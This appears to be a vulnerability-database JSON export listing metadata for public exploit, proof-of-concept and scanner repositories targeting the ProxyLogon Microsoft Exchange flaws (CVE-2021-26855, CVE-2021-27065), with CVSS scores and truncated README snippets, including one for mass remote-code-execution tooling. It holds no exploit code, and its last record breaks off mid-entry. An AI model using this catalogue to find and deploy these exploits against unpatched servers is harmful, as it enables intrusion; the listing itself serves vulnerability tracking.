{"githubexploit": [{"lastseen": "2022-02-21T13:50:39", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T16:54:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-21978", "CVE-2021-26855"], "modified": "2022-02-21T12:12:08", "id": "F5339382-9321-5B96-934D-B803353CC9E3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:31:55", "description": "# Exch-CVE-2021-26855\nProxyLogon is the formally generic name fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2021-03-14T14:23:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-16T09:48:52", "id": "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:15:35", "description": "# proxylogscan\n\n<img src=\"https://proxylogon.com/images/logo-whi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T11:54:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": 
false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T15:41:34", "id": "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T14:00:56", "description": "# ProxyLogon For Python3\nProxyLogon(CVE-2021-26855+CVE-2021-2706...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T03:56:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-28T09:27:18", "id": "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:36", "description": "# Exchange SSRF toRCE Exploit\n\n\n\n**:warning:For educational and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T09:02:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-10-24T06:16:43", "id": "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:16", "description": "# CVE-2021-26855\nCVE-2021-26855, also known as Proxylogon, is a ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T19:35:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-11-16T01:46:59", "id": "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T03:31:40", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-01-10T21:06:44", "id": "14573955-860C-5947-8F2F-86347A606742", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:19", "description": "# 106362522\n\u91dd\u5c0d\u8fd1\u671f\u5fae\u8edf\u516c\u5e03\u4fee\u88dc\u906d\u99ed\u5ba2\u653b\u64ca\u7684Exchange Server\u6f0f\u6d1e\u554f\u984c\uff0c\u53f0\u7063DEVCORE\u8868\u793a\u65e9\u57281\u67085...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-19T09:33:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-04-19T09:35:18", "id": "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:01:50", "description": "# proxylogon\n\nProof-of-concept exploit for CVE-2021-26855 and CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-24T01:12:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-27T19:34:57", "id": "D7D704DD-277E-5739-BD5E-3782370FCCB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:19:32", "description": "# ProxyLogon\n\nProxyLogon is the formally generic name for CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T07:31:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T19:09:09", "id": "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:26:23", "description": "# ProxyLogon-Mass-RCE\n## Description\nPython for mass deploying p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-23T17:09:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-05-23T17:23:03", "id": "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": " ove...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:21:19", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-21T15:50:38", "id": "3019C843-FE2F-527C-B7C1-14A1C3066721", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:45:03", "description": "# CVE-2021-26855-Scanner\nScanner and PoC for CVE-2021-26855 \n\nCr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-12T12:47:41", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-29T15:00:52", "id": "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:20", "description": "# CVE-2021-26855\nPoC for CVE-2021-26855 -Just a checker-\n\n# Usag...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-06T23:12:22", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-05T07:21:07", "id": "13364575-934B-5E73-AA03-AEB6910F6AD2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:23", "description": "# ExchangeWeaknessTest\n\nThis script test the CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T09:40:29", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-09T09:43:55", "id": "7758268F-2004-536A-B51F-62DA1E5A992D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:28", "description": "# ProxyLogon-CVE-2021-26855\nRCE exploit for ProxyLogon vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-14T22:57:21", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-11-25T15:13:15", "id": "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:26", "description": "# CVE-2021-26855-SSRF-Exchange\nCVE-2021-26855 SSRF Exchange Serv...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T00:55:16", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": 
"2021-12-15T14:41:36", "id": "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T16:13:12", "description": "# poc_proxylogon\nMicrosoft Exchange ProxyLogon PoC (CVE-2021-268...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-04T22:38:30", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-02-22T05:29:04", "id": "81FEB23C-D090-5CE8-9B92-00BE597DE052", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-04T01:37:18", "description": "# proxylogon\nmy exploit for the proxylogon chain (Microsoft Exch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-14T13:04:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-08-03T23:25:44", "id": "7C80631A-74CB-54F0-BC26-01EEF7D52760", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:39", "description": "# hafnium-exchange-splunk-csvs\nIOCs (IP addresses, hashes of web...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 